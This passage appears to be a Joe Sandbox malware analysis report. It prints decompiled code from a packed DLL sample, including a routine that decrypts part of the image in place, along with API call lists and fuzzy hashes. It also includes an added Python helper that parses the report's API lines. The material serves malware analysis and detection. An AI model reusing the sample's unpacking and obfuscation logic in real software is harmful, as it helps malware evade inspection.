                                                  					_t26 =  *0xecd27c; // 0x213a5a8
                                                  					if( *0xecd25c > 5) {
                                                  						_t8 = _t26 + 0xece5cd; // 0x4d283a53
                                                  						_t27 = _t8;
                                                  					} else {
                                                  						_t7 = _t26 + 0xecea15; // 0x44283a44
                                                  						_t27 = _t7;
                                                  					}
                                                  					E00EC1BF4(_t27, _t27);
                                                  					_t31 = E00EC1B2F(_t61,  &_v20,  &_v12); // executed
                                                  					if(_t31 == 0) {
                                                  						CloseHandle(_v20);
                                                  					}
                                                  					_t62 = 5;
                                                  					if(_t54 != _t62) {
                                                  						 *0xecd270 =  *0xecd270 ^ 0x81bbe65d;
                                                  						_t32 = E00EC2049(0x60);
                                                  						__eflags = _t32;
                                                  						 *0xecd32c = _t32;
                                                  						if(_t32 == 0) {
                                                  							_push(8);
                                                  							_pop(0);
                                                  						} else {
                                                  							memset(_t32, 0, 0x60);
                                                  							_t49 =  *0xecd32c; // 0x30095b0
                                                  							_t68 = _t68 + 0xc;
                                                  							__imp__(_t49 + 0x40);
                                                  							_t51 =  *0xecd32c; // 0x30095b0
                                                  							 *_t51 = 0xece836;
                                                  						}
                                                  						__eflags = 0;
                                                  						_t54 = 0;
                                                  						if(0 == 0) {
                                                  							_t36 = RtlAllocateHeap( *0xecd238, 0, 0x43);
                                                  							__eflags = _t36;
                                                  							 *0xecd2c4 = _t36;
                                                  							if(_t36 == 0) {
                                                  								_push(8);
                                                  								_pop(0);
                                                  							} else {
                                                  								_t56 =  *0xecd25c; // 0x2000000a
                                                  								_t61 = _t56 & 0x000000ff;
                                                  								_t58 =  *0xecd27c; // 0x213a5a8
                                                  								_t13 = _t58 + 0xece55a; // 0x697a6f4d
                                                  								_t55 = _t13;
                                                  								wsprintfA(_t36, _t13, _t56 & 0x000000ff, _t56 & 0x000000ff, 0xecc2a7);
                                                  							}
                                                  							__eflags = 0;
                                                  							_t54 = 0;
                                                  							if(0 == 0) {
                                                  								asm("sbb eax, eax");
                                                  								E00EC269C( ~_v8 &  *0xecd270, 0xecd00c); // executed
                                                  								_t42 = E00EC4094(_t55); // executed
                                                  								_t54 = _t42;
                                                  								__eflags = _t54;
                                                  								if(_t54 != 0) {
                                                  									goto L30;
                                                  								}
                                                  								_t43 = E00EC96A4(_t55); // executed
                                                  								__eflags = _t43;
                                                  								if(_t43 != 0) {
                                                  									__eflags = _v8;
                                                  									_t65 = _v12;
                                                  									if(_v8 != 0) {
                                                  										L29:
                                                  										_t44 = E00EC6786(_t61, _t65, _v8); // executed
                                                  										_t54 = _t44;
                                                  										goto L30;
                                                  									}
                                                  									__eflags = _t65;
                                                  									if(__eflags == 0) {
                                                  										goto L30;
                                                  									}
                                                  									_t46 = E00EC3DD9(__eflags,  &(_t65[4])); // executed
                                                  									_t54 = _t46;
                                                  									__eflags = _t54;
                                                  									if(_t54 == 0) {
                                                  										goto L30;
                                                  									}
                                                  									goto L29;
                                                  								}
                                                  								_t54 = 8;
                                                  							}
                                                  						}
                                                  					} else {
                                                  						_t66 = _v12;
                                                  						if(_t66 == 0) {
                                                  							L30:
                                                  							if(_v16 == 0 || _v16 == 1) {
                                                  								 *0xecd160();
                                                  							}
                                                  							goto L34;
                                                  						}
                                                  						_t67 =  &(_t66[4]);
                                                  						do {
                                                  						} while (E00ECA501(_t62, _t67, 0, 1) == 0x4c7);
                                                  					}
                                                  					goto L30;
                                                  				} else {
                                                  					_t54 = _t22;
                                                  					L34:
                                                  					return _t54;
                                                  				}
                                                  			}

                                                  APIs
                                                    • Part of subcall function 00EC550E: GetModuleHandleA.KERNEL32(4C44544E,00000000,00EC2274,00000000,00000000), ref: 00EC551D
                                                  • CloseHandle.KERNEL32(?,?,?,4D283A53,?,?), ref: 00EC22F1
                                                    • Part of subcall function 00EC2049: RtlAllocateHeap.NTDLL(00000000,00000000,00EC7E50), ref: 00EC2055
                                                  • memset.NTDLL ref: 00EC2340
                                                  • RtlInitializeCriticalSection.NTDLL(03009570), ref: 00EC2351
                                                    • Part of subcall function 00EC3DD9: memset.NTDLL ref: 00EC3DEE
                                                    • Part of subcall function 00EC3DD9: lstrlenW.KERNEL32(00000000,00410025,00000005,?,00000000), ref: 00EC3E22
                                                    • Part of subcall function 00EC3DD9: StrCmpNIW.KERNELBASE(00000000,00000000,00000000), ref: 00EC3E2D
                                                  • RtlAllocateHeap.NTDLL(00000000,00000043,00000060), ref: 00EC237C
                                                  • wsprintfA.USER32 ref: 00EC23AC
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.647362848.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                  • Associated: 00000000.00000002.647333760.0000000000EC0000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.647432081.0000000000ECC000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.647480156.0000000000ECD000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.647542838.0000000000ECF000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_ec0000_loaddll32.jbxd
                                                  Similarity
                                                  • API ID: AllocateHandleHeapmemset$CloseCriticalInitializeModuleSectionlstrlenwsprintf
                                                  • String ID:
                                                  • API String ID: 4246211962-0
                                                  • Opcode ID: e32c2d0b12cb73942f60d44169228235e7b5b3c51b0676ec7bf1e95b8e353e2d
                                                  • Instruction ID: df2f11aecd1d1bf147f472e2ac9d28c374f532fe369b33d5ad1bcb62ffa1ead4
                                                  • Opcode Fuzzy Hash: e32c2d0b12cb73942f60d44169228235e7b5b3c51b0676ec7bf1e95b8e353e2d
                                                  • Instruction Fuzzy Hash: 2A51E171A00215AFCB28DBA5DE45FAE37E8BB08708F14543EF211F7261E677990B9B50
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 56%
                                                  			E00EC8504(void* __ecx, char _a4, void** _a8, intOrPtr* _a12, intOrPtr* _a16, intOrPtr* _a20) {
                                                  				void* _v8;
                                                  				void* __edi;
                                                  				intOrPtr _t18;
                                                  				void* _t24;
                                                  				void* _t25;
                                                  				void* _t30;
                                                  				void* _t37;
                                                  				void* _t40;
                                                  				intOrPtr _t42;
                                                  
                                                  				_t32 = __ecx;
                                                  				_push(__ecx);
                                                  				_push(__ecx);
                                                  				_t42 =  *0xecd340; // 0x3008d39
                                                  				_push(0x800);
                                                  				_push(0);
                                                  				_push( *0xecd238);
                                                  				if( *0xecd24c >= 5) {
                                                  					if(RtlAllocateHeap() == 0) {
                                                  						L6:
                                                  						_t30 = 8;
                                                  						L7:
                                                  						if(_t30 != 0) {
                                                  							L10:
                                                  							 *0xecd24c =  *0xecd24c + 1;
                                                  							L11:
                                                  							return _t30;
                                                  						}
                                                  						_t7 =  &_a4; // 0xec685f
                                                  						_t44 =  *_t7;
                                                  						_t40 = _v8;
                                                  						 *_a16 =  *_t7;
                                                  						 *_a20 = E00EC2496(_t44, _t40); // executed
                                                  						_t18 = E00ECA66E(_t37, _t40, _t44); // executed
                                                  						if(_t18 != 0) {
                                                  							 *_a8 = _t40;
                                                  							 *_a12 = _t18;
                                                  							if( *0xecd24c < 5) {
                                                  								 *0xecd24c =  *0xecd24c & 0x00000000;
                                                  							}
                                                  							goto L11;
                                                  						}
                                                  						_t30 = 0xbf;
                                                  						E00ECA1B0();
                                                  						RtlFreeHeap( *0xecd238, 0, _t40); // executed
                                                  						goto L10;
                                                  					}
                                                  					_t4 =  &_a4; // 0xec685f
                                                  					_t6 =  &_a4; // 0xec685f
                                                  					_t24 = E00ECA279( *_t6, _t32, _t37, _t42,  &_v8, _t4, _t13);
                                                  					L5:
                                                  					_t30 = _t24;
                                                  					goto L7;
                                                  				}
                                                  				_t25 = RtlAllocateHeap(); // executed
                                                  				if(_t25 == 0) {
                                                  					goto L6;
                                                  				}
                                                  				_t1 =  &_a4; // 0xec685f
                                                  				_t3 =  &_a4; // 0xec685f
                                                  				_t24 = E00EC8B94( *_t3, _t32, _t37, _t42,  &_v8, _t1, _t25); // executed
                                                  				goto L5;
                                                  			}
                                                  0x00ec8551
                                                  0x00ec8559
                                                  0x00ec855d
                                                  0x00ec8562
                                                  0x00ec8562
                                                  0x00000000
                                                  0x00ec8562
                                                  0x00ec8528
                                                  0x00ec8530
                                                  0x00000000
                                                  0x00000000
                                                  0x00ec8533
                                                  0x00ec853b
                                                  0x00ec853f
                                                  0x00000000

                                                  APIs
                                                  • RtlAllocateHeap.NTDLL(00000000,00000800,7519F710), ref: 00EC8528
                                                    • Part of subcall function 00EC8B94: GetTickCount.KERNEL32 ref: 00EC8BA8
                                                    • Part of subcall function 00EC8B94: wsprintfA.USER32 ref: 00EC8BF8
                                                    • Part of subcall function 00EC8B94: wsprintfA.USER32 ref: 00EC8C15
                                                    • Part of subcall function 00EC8B94: wsprintfA.USER32 ref: 00EC8C41
                                                    • Part of subcall function 00EC8B94: HeapFree.KERNEL32(00000000,?), ref: 00EC8C53
                                                    • Part of subcall function 00EC8B94: wsprintfA.USER32 ref: 00EC8C74
                                                    • Part of subcall function 00EC8B94: HeapFree.KERNEL32(00000000,?), ref: 00EC8C84
                                                    • Part of subcall function 00EC8B94: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 00EC8CB2
                                                    • Part of subcall function 00EC8B94: GetTickCount.KERNEL32 ref: 00EC8CC3
                                                  • RtlAllocateHeap.NTDLL(00000000,00000800,7519F710), ref: 00EC8546
                                                  • RtlFreeHeap.NTDLL(00000000,00000002,_h,?,00EC685F,00000002,?,?,00EC2417,?), ref: 00EC85A3
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.647362848.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.647333760.0000000000EC0000.00000004.00020000.sdmp
• Associated: 00000000.00000002.647432081.0000000000ECC000.00000002.00020000.sdmp
• Associated: 00000000.00000002.647480156.0000000000ECD000.00000004.00020000.sdmp
• Associated: 00000000.00000002.647542838.0000000000ECF000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_ec0000_loaddll32.jbxd
                                                  Similarity
                                                  • API ID: Heap$wsprintf$AllocateFree$CountTick
                                                  • String ID: _h
                                                  • API String ID: 1676223858-4139817520
                                                  • Opcode ID: c7b41b0c3edf231d14bc05ac230426010320dcc3ea9d3fe75b14951275f011c1
                                                  • Instruction ID: 64b0f9248dc77adbfc5f100db70be0f282faa0d3f3ee52228d500b1b096b873f
                                                  • Opcode Fuzzy Hash: c7b41b0c3edf231d14bc05ac230426010320dcc3ea9d3fe75b14951275f011c1
                                                  • Instruction Fuzzy Hash: 23213E76200204EFDB159F55DF85FAA37ACEB48344F10503AF901B7260DBB3E9469BA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • SysAllocString.OLEAUT32(80000002), ref: 00EC3B46
                                                  • SysAllocString.OLEAUT32(00EC1885), ref: 00EC3B89
                                                  • SysFreeString.OLEAUT32(00000000), ref: 00EC3B9D
                                                  • SysFreeString.OLEAUT32(00000000), ref: 00EC3BAB
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.647362848.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.647333760.0000000000EC0000.00000004.00020000.sdmp
• Associated: 00000000.00000002.647432081.0000000000ECC000.00000002.00020000.sdmp
• Associated: 00000000.00000002.647480156.0000000000ECD000.00000004.00020000.sdmp
• Associated: 00000000.00000002.647542838.0000000000ECF000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_ec0000_loaddll32.jbxd
                                                  Similarity
                                                  • API ID: String$AllocFree
                                                  • String ID:
                                                  • API String ID: 344208780-0
                                                  • Opcode ID: 3f8c1cdf541bf5712caedb0b87969cc78f479d329552fb912f1a3591b5637ac4
                                                  • Instruction ID: 92f7c2ac643513c229f31d0f491c2f1e10eeef6c9c3850b2f3b781d62057bab9
                                                  • Opcode Fuzzy Hash: 3f8c1cdf541bf5712caedb0b87969cc78f479d329552fb912f1a3591b5637ac4
                                                  • Instruction Fuzzy Hash: 1F31D871900109EFCB05DFA9D9C4DAE7BB5FF48344B21846EE50AA7210D7369E46CF61
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 87%
			E004018F4(void* __edi, intOrPtr _a4) {
				intOrPtr _v8;
				unsigned int _v12;
				intOrPtr _v16;
				char _v20;
				void* _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				void* _v36;
				signed int _v44;
				signed int _v48;
				intOrPtr _t39;
				void* _t46;
				intOrPtr _t47;
				intOrPtr _t50;
				signed int _t59;
				signed int _t61;
				intOrPtr _t66;
				intOrPtr _t77;
				void* _t78;
				signed int _t80;

				/* Decrypts a region of this image in place, one 0x1000-byte page at a time: E00401F5D locates
				   the region, each page is transformed into a PAGE_READWRITE scratch buffer, a running check
				   value is compared with a constant, and only on a match are the decrypted bytes copied back
				   over the original region. The "@ addr" comments are the report's per-statement instruction
				   addresses; 0x00000000 marks a synthetic break/goto with no instruction of its own. */
				_t77 =  *0x404130; // @ 0x004018fb
				_t39 = E00401F5D(_t77,  &_v20,  &_v12); // @ 0x0040190b   on success _v20 = region offset, _v12 = region size
				_v16 = _t39; // @ 0x00401912
				if(_t39 == 0) { // @ 0x00401915
					asm("sbb ebx, ebx"); // @ 0x0040192a
					_t59 = (_v12 >> 0xc) + ((_v12 & 0x00000fff) != 0); // @ 0x00401931   pages = ceil(size / 0x1000); the neg/sbb/neg idiom, which the decompiler rendered as ~(~(...)), contributes 1 for a partial page
					_t78 = _t77 + _v20; // @ 0x00401936   start of the encrypted region
					_v36 = _t78; // @ 0x00401947
					_t46 = VirtualAlloc(0, _t59 << 0xc, 0x3000, 4); // executed @ 0x0040194a   MEM_COMMIT|MEM_RESERVE, PAGE_READWRITE scratch buffer of whole pages
					_v24 = _t46; // @ 0x00401952
					if(_t46 == 0) { // @ 0x00401955
						_v16 = 8; // @ 0x004019ff   failure code when the scratch buffer cannot be allocated
					} else { // @ 0x0040195b
						_t61 = 0; // @ 0x0040195b   page counter
						if(_t59 <= 0) { // @ 0x0040195f
							_t47 =  *0x40414c; // @ 0x004019c7   empty region: reuse the stored check value
						} else { // @ 0x00401961
							_t66 = _a4; // @ 0x00401961
							_t50 = _t46 - _t78; // @ 0x00401964   scratch - region; added to a region pointer it yields the scratch twin
							_t11 = _t66 + 0x4051a7; // 0x4051a7 @ 0x00401966
							_v28 = _t50; // @ 0x0040196e
							_v32 = _t50 + _t11; // @ 0x00401971   scratch copy of the 16-byte structure the check value is read from
							_v8 = _t78; // @ 0x00401974   current source page
							while(1) { // @ 0x0040197c
								asm("movsd"); // @ 0x00401984   three movsd copy 12 bytes (operands not recovered by the decompiler)
								asm("movsd"); // @ 0x00401985
								asm("movsd"); // @ 0x00401986
								_t19 = _t61 + 1; // 0x2 @ 0x0040198d
								_t80 = _t19; // @ 0x0040198d
								E004018C4(_v8 + _t50, _v8, (_v48 ^ _v44) + _v20 + _a4 >> _t80); // @ 0x004019a1   per-page transform, source page -> scratch twin; the third argument varies with the page index (E004018C4 not shown here)
								_t64 = _v32; // @ 0x004019a6
								_v8 = _v8 + 0x1000; // @ 0x004019af   next page
								_t47 =  *((intOrPtr*)(_v32 + 0xc)) -  *((intOrPtr*)(_t64 + 8)) +  *((intOrPtr*)(_t64 + 4)); // @ 0x004019b6   running check value
								_t61 = _t80; // @ 0x004019b9
								 *0x40414c = _t47; // @ 0x004019bd
								if(_t61 >= _t59) { // @ 0x004019c2
									break; // @ 0x00000000
								} // @ 0x00000000
								_t50 = _v28; // @ 0x00401979
							} // @ 0x00401979
						} // @ 0x004019c4
						if(_t47 != 0x63699bc3) { // @ 0x004019d1   expected check value; on a mismatch (wrong key or altered data) the region is left untouched
							_v16 = 0xc; // @ 0x004019e6
						} else { // @ 0x004019d3
							memcpy(_v36, _v24, _v12); // @ 0x004019dc   commit the decrypted bytes over the original region
						} // @ 0x004019e1
						VirtualFree(_v24, 0, 0x8000); // executed @ 0x004019f7   MEM_RELEASE
					} // @ 0x004019f7
				} // @ 0x00401a06
				return _v16; // @ 0x00401a0c
			}

                                                  APIs
                                                  • VirtualAlloc.KERNELBASE(00000000,0040167D,00003000,00000004,?,?,0040167D,00000000), ref: 0040194A
                                                  • memcpy.NTDLL(?,?,0040167D,?,?,0040167D,00000000), ref: 004019DC
                                                  • VirtualFree.KERNELBASE(?,00000000,00008000,?,?,0040167D,00000000), ref: 004019F7
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.644892830.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.644956841.0000000000405000.00000040.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Virtual$AllocFreememcpy
                                                  • String ID: Mar 9 2021
                                                  • API String ID: 4010158826-2159264323
                                                  • Opcode ID: ecb228c351fb0361c2fc9e029ed6e6128681d59fb3180a8fdea020d7e3bab62b
                                                  • Instruction ID: 0ad7c3425218c347bc4ddf429e648667056d2cd7a8494b6520e06ca5c12f1d10
                                                  • Opcode Fuzzy Hash: ecb228c351fb0361c2fc9e029ed6e6128681d59fb3180a8fdea020d7e3bab62b
                                                  • Instruction Fuzzy Hash: AF3163B1E011199FDF01CF99C881AAEBBB9FF48304F108139E505BB295D775AA45CF98
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%
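The APIs block above lists each traced call with the argument words the sandbox captured from the stack at the call. As an added example (not part of the Joe Sandbox report or of the sample), the Python below parses those bullet lines into records and decodes the VirtualAlloc / VirtualFree constants, so the memory operations of a function such as E004018F4 can be filtered, for instance for executable allocations. The sample lines are copied from the report, except the one marked CONSTRUCTED; the flag names are the documented Win32 values.

```python
"""Parse the bullet lines of a Joe Sandbox "APIs" block and decode the
VirtualAlloc / VirtualFree constants they carry.  Added example, not part of
the report; MEM_* and PAGE_* values are the documented Win32 constants."""
import re
from typing import Optional, Union

# Two shapes occur in the report:
#   • VirtualAlloc.KERNELBASE(00000000,0040167D,00003000,00000004,...), ref: 0040194A
#   • Part of subcall function 00EC8B94: GetTickCount.KERNEL32 ref: 00EC8BA8
API_LINE = re.compile(
    r"^\s*•?\s*(?:Part of subcall function\s+(?P<parent>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?"
    r"\s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

MEM_FLAGS = {0x1000: "MEM_COMMIT", 0x2000: "MEM_RESERVE", 0x4000: "MEM_DECOMMIT",
             0x8000: "MEM_RELEASE", 0x80000: "MEM_RESET", 0x100000: "MEM_TOP_DOWN",
             0x20000000: "MEM_LARGE_PAGES"}
PAGE_BASE = {0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
             0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
             0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY"}
PAGE_MODIFIER = {0x100: "PAGE_GUARD", 0x200: "PAGE_NOCACHE", 0x400: "PAGE_WRITECOMBINE"}

Arg = Union[int, str, None]


def _arg(token: str) -> Arg:
    """Hex word -> int; '?' (not recovered by the tracer) -> None; anything
    else (e.g. the resolved string '_h') is kept verbatim."""
    token = token.strip()
    if token == "?":
        return None
    try:
        return int(token, 16)
    except ValueError:
        return token


def parse_api_line(line: str) -> Optional[dict]:
    """One bullet -> record, or None for lines that are not API bullets."""
    m = API_LINE.match(line)
    if m is None:
        return None
    raw = m.group("args")
    return {"api": m.group("api"), "module": m.group("module"),
            "parent": m.group("parent"), "ref": int(m.group("ref"), 16),
            "args": [_arg(a) for a in raw.split(",")] if raw else []}


def decode_mem_flags(value: int) -> list:
    return [name for bit, name in sorted(MEM_FLAGS.items()) if value & bit]


def decode_protect(value: int) -> dict:
    base = value & 0xFF  # low byte is the base protection, higher bits are modifiers
    names = [PAGE_BASE.get(base, "0x%x" % base)]
    names += [n for bit, n in sorted(PAGE_MODIFIER.items()) if value & bit]
    return {"names": names,
            "executable": base in (0x10, 0x20, 0x40, 0x80),
            "writable": base in (0x04, 0x08, 0x40, 0x80)}


def describe(entry: dict) -> dict:
    """Attach decoded meaning to the memory APIs; other calls pass through."""
    out = dict(entry)
    a = entry["args"]
    if entry["api"] == "VirtualAlloc" and len(a) >= 4:
        out["alloc_type"] = decode_mem_flags(a[2]) if isinstance(a[2], int) else None
        out["protect"] = decode_protect(a[3]) if isinstance(a[3], int) else None
    elif entry["api"] == "VirtualFree" and len(a) >= 3:
        out["free_type"] = decode_mem_flags(a[2]) if isinstance(a[2], int) else None
    return out


def summarize(lines) -> list:
    return [describe(e) for e in map(parse_api_line, lines) if e is not None]


def executable_allocations(lines) -> list:
    """ref addresses of VirtualAlloc calls requesting an executable protection."""
    return [e["ref"] for e in summarize(lines)
            if e.get("protect") and e["protect"]["executable"]]


# Lines copied from the report's APIs blocks.
REPORT_LINES = [
    "• VirtualAlloc.KERNELBASE(00000000,0040167D,00003000,00000004,?,?,0040167D,00000000), ref: 0040194A",
    "• memcpy.NTDLL(?,?,0040167D,?,?,0040167D,00000000), ref: 004019DC",
    "• VirtualFree.KERNELBASE(?,00000000,00008000,?,?,0040167D,00000000), ref: 004019F7",
    "• RtlAllocateHeap.NTDLL(00000000,00000800,7519F710), ref: 00EC8528",
    "  • Part of subcall function 00EC8B94: GetTickCount.KERNEL32 ref: 00EC8BA8",
    "• RtlFreeHeap.NTDLL(00000000,00000002,_h,?,00EC685F,00000002,?,?,00EC2417,?), ref: 00EC85A3",
]
# CONSTRUCTED line (not in the report) so the RWX filter has something to flag.
RWX_LINE = "• VirtualAlloc.KERNELBASE(00000000,00001000,00003000,00000040), ref: 00401234"

if __name__ == "__main__":
    for e in summarize(REPORT_LINES + [RWX_LINE]):
        extra = {k: e[k] for k in ("alloc_type", "protect", "free_type") if k in e}
        print("%08X %s.%s %s" % (e["ref"], e["module"], e["api"], extra or ""))
```

One caveat when reading the argument columns this way: they are a snapshot of the stack words at the call, not a typed argument list. In the VirtualAlloc line above the second word is 0040167D, which cannot be the size the decompilation computes at run time (_t59 << 0xc); the same value recurs in the trailing columns of the memcpy and VirtualFree lines, the pattern of a return address sitting on the stack. Take sizes from the decompiled code and use the columns for the constant flags, which are reliable because they are pushed as immediates.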

                                                  C-Code - Quality: 78%
			E00EC1A70(intOrPtr* __eax, void** _a4, intOrPtr* _a8) {
				intOrPtr _v8;
				void* _v12;
				void* _v16;
				intOrPtr _t26;
				intOrPtr* _t28;
				intOrPtr _t31;
				intOrPtr* _t32;
				void* _t39;
				int _t46;
				intOrPtr* _t47;
				int _t48;

				/* Reads a wide string out of a COM object and hands back a heap copy. __eax is an interface
				   pointer; its method at vtable offset 0x24 returns a second object (_v12), whose method at
				   vtable offset 0x100 returns a BSTR (_v16). Outputs: *_a4 = heap copy (0 if none),
				   *_a8 = its size in bytes. Return value is the last HRESULT. The "@ addr" comments are the
				   report's per-statement instruction addresses; 0x00000000 marks a synthetic goto. */
				_t47 = __eax; // @ 0x00ec1a7c
				_push( &_v12); // @ 0x00ec1a80
				_push(__eax); // @ 0x00ec1a81
				_t39 = 0; // @ 0x00ec1a82   result buffer
				_t46 = 0; // executed @ 0x00ec1a84   character count
				_t26 =  *((intOrPtr*)( *__eax + 0x24))(); // @ 0x00ec1a86   vtable slot 9, called with the pushed (this, &_v12)
				_v8 = _t26; // @ 0x00ec1a8b
				if(_t26 < 0) { // @ 0x00ec1a8e   failed HRESULT
					L13: // @ 0x00ec1b25
					return _v8; // @ 0x00ec1b2c
				} // @ 0x00ec1b2c
				if(_v12 == 0) { // @ 0x00ec1a97   succeeded but returned no object: wait 200 ms and retry once
					Sleep(0xc8); // @ 0x00ec1a9e
					_v8 =  *((intOrPtr*)( *_t47 + 0x24))(_t47,  &_v12); // @ 0x00ec1aae
				} // @ 0x00ec1aae
				if(_v8 >= _t39) { // @ 0x00ec1ab4   SUCCEEDED(hr)
					_t28 = _v12; // @ 0x00ec1ab6
					if(_t28 != 0) { // @ 0x00ec1abb
						_t31 =  *((intOrPtr*)( *_t28 + 0x100))(_t28,  &_v16); // @ 0x00ec1ac4   vtable slot 64: returns a BSTR in _v16
						_v8 = _t31; // @ 0x00ec1acc
						if(_t31 >= 0) { // @ 0x00ec1acf
							_t46 = lstrlenW(_v16); // @ 0x00ec1ada
							if(_t46 != 0) { // @ 0x00ec1ade
								_t46 = _t46 + 1; // @ 0x00ec1ae0   include the terminator
								_t48 = _t46 + _t46; // @ 0x00ec1ae1   byte size of the wide string
								_t39 = E00EC2049(_t48); // @ 0x00ec1aea   the sample's heap allocator
								if(_t39 == 0) { // @ 0x00ec1aee
									_v8 = 0x8007000e; // @ 0x00ec1aff   E_OUTOFMEMORY
								} else { // @ 0x00ec1af0
									memcpy(_t39, _v16, _t48); // @ 0x00ec1af5
								} // @ 0x00ec1afa
								__imp__#6(_v16); // @ 0x00ec1b09   OLEAUT32 ordinal 6 = SysFreeString
							} // @ 0x00ec1b09
						} // @ 0x00ec1ade
						_t32 = _v12; // @ 0x00ec1b0f
						 *((intOrPtr*)( *_t32 + 8))(_t32); // @ 0x00ec1b15   vtable slot 2 = IUnknown::Release
					} // @ 0x00ec1b15
					 *_a4 = _t39; // @ 0x00ec1b1e
					 *_a8 = _t46 + _t46; // @ 0x00ec1b23   bytes including the terminator; 0 when the string was empty
				} // @ 0x00ec1b23
				goto L13; // @ 0x00000000
			}

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.647362848.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.647333760.0000000000EC0000.00000004.00020000.sdmp
• Associated: 00000000.00000002.647432081.0000000000ECC000.00000002.00020000.sdmp
• Associated: 00000000.00000002.647480156.0000000000ECD000.00000004.00020000.sdmp
• Associated: 00000000.00000002.647542838.0000000000ECF000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_ec0000_loaddll32.jbxd
                                                  Similarity
                                                  • API ID: FreeSleepStringlstrlenmemcpy
                                                  • String ID:
                                                  • API String ID: 1198164300-0
                                                  • Opcode ID: 03db6a9eca220b5b6a5b4160bd0a05c21d7437e683678780e95d79900692b70d
                                                  • Instruction ID: b0464a799142fa2f087681884e0ea602bab78a0a2a257a8ace7281c98be77668
                                                  • Opcode Fuzzy Hash: 03db6a9eca220b5b6a5b4160bd0a05c21d7437e683678780e95d79900692b70d
                                                  • Instruction Fuzzy Hash: 1F212F75A01209EFCB10DFA4DA84E9EBBB5FF49315B1041ADE905E7211E7319E46CF50
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 53%
			E00EC94A9(char* __eax) {
				char* _t8;
				intOrPtr _t12;
				char* _t21;
				signed int _t23;
				char* _t24;
				signed int _t26;
				void* _t27;

				/* Splits a space-separated string in place into an array of char* tokens. The spaces are
				   counted first to size the array (one slot per token, no terminating slot); because the
				   count is taken on the untrimmed string it is an upper bound, so the array cannot be
				   overrun by the split loop. The string is trimmed with the character set at 0xecc2a4 and
				   each separator is overwritten with NUL. The decompiler did not recover the arguments:
				   _t27 + 0x10 is a local holding the array, _t27 + 0x18 an out-pointer that receives it.
				   Returns 0 in all cases; on allocation failure the out-pointer is left untouched.
				   The "@ addr" comments are the report's per-statement instruction addresses. */
				_t21 = __eax; // @ 0x00ec94b4
				_push(0x20); // @ 0x00ec94b8
				_t23 = 1; // @ 0x00ec94ba   token count = spaces + 1
				_push(__eax); // @ 0x00ec94bb
				while(1) { // @ 0x00ec94c3
					_t8 = StrChrA(); // @ 0x00ec94c3   StrChrA(str, ' ') with the pushed arguments
					if(_t8 == 0) { // @ 0x00ec94c7
						break; // @ 0x00000000
					} // @ 0x00000000
					_t23 = _t23 + 1; // @ 0x00ec94be
					_push(0x20); // @ 0x00ec94bf
					_push( &(_t8[1])); // @ 0x00ec94c2   continue after the space just found
				} // @ 0x00ec94c2
				_t12 = E00EC2049(_t23 << 2); // @ 0x00ec94cf   _t23 pointers from the sample's heap allocator
				 *((intOrPtr*)(_t27 + 0x10)) = _t12; // @ 0x00ec94d6
				if(_t12 != 0) { // @ 0x00ec94da
					StrTrimA(_t21, 0xecc2a4); // executed @ 0x00ec94e2   strip leading/trailing characters of the set at 0xecc2a4
					_t26 = 0; // @ 0x00ec94e8   slot index
					do { // @ 0x00ec94ea
						_t24 = StrChrA(_t21, 0x20); // @ 0x00ec94ef
						if(_t24 != 0) { // @ 0x00ec94f3
							 *_t24 = 0; // @ 0x00ec94f5   terminate the current token in place
							_t24 =  &(_t24[1]); // @ 0x00ec94f8
							StrTrimA(_t24, 0xecc2a4); // @ 0x00ec94ff   trim the remainder with the same set
						} // @ 0x00ec94ff
						 *( *((intOrPtr*)(_t27 + 0x10)) + _t26 * 4) = _t21; // @ 0x00ec9509
						_t26 = _t26 + 1; // @ 0x00ec950c
						_t21 = _t24; // @ 0x00ec950f
					} while (_t24 != 0); // @ 0x00ec950f
					 *((intOrPtr*)( *((intOrPtr*)(_t27 + 0x18)))) =  *((intOrPtr*)(_t27 + 0x10)); // @ 0x00ec951b   publish the array through the out-pointer
				} // @ 0x00ec951b
				return 0; // @ 0x00ec9528
			}

                                                  APIs
